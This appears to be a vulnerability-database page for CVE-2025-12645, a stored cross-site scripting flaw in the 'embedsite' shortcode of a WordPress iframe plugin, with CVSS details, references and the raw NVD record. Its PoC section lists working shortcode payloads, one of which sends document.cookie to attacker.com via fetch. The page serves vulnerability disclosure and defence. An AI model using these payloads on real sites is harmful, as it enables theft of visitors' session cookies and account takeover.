CVE-2025-12645

Description

The Inline frame – Iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedsite' shortcode in all versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Inline frame – Iframe plugin for WordPress <= 0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- WordPress Inline frame - Iframe Plugin XSS PoC -->
<!-- Login as Contributor or higher role -->
<!-- Insert this shortcode in a post/page -->

[embedsite src='javascript:alert(document.cookie)' html='<img src=x onerror=alert(String.fromCharCode(88,83,83))>']

<!-- Alternative payload using onload event -->
[embedsite src='https://attacker.com' html='<iframe src="" onload="alert(document.domain)">']

<!-- Cookie stealing payload -->
[embedsite src='javascript:fetch("https://attacker.com/steal?c="+document.cookie)' html='<img src=x>']

<!-- XSS via URL parameter injection -->
[embedsite src='https://example.com?param=<script>alert(1)</script>' html='<div></div>']

<!-- Notes: 
1. The vulnerable code in iframe.php does not sanitize the 'src' attribute
2. The 'html' parameter content is also not properly escaped
3. When page is rendered, the malicious JavaScript executes in victim's browser
4. Attacker needs Contributor role or higher to exploit
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12645
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12645
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12645/
[4] VulDB https://vuldb.com/cve/CVE-2025-12645
[5] https://plugins.trac.wordpress.org/browser/inline-frame-iframe/tags/0.1/iframe.php#L76
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/ceda1e49-4e65-4038-9207-ef4647838f53?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12645", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:49.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Inline frame – Iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedsite' shortcode in all versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/inline-frame-iframe/tags/0.1/iframe.php#L76", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ceda1e49-4e65-4038-9207-ef4647838f53?source=cve", "source": "[email protected]"}]}}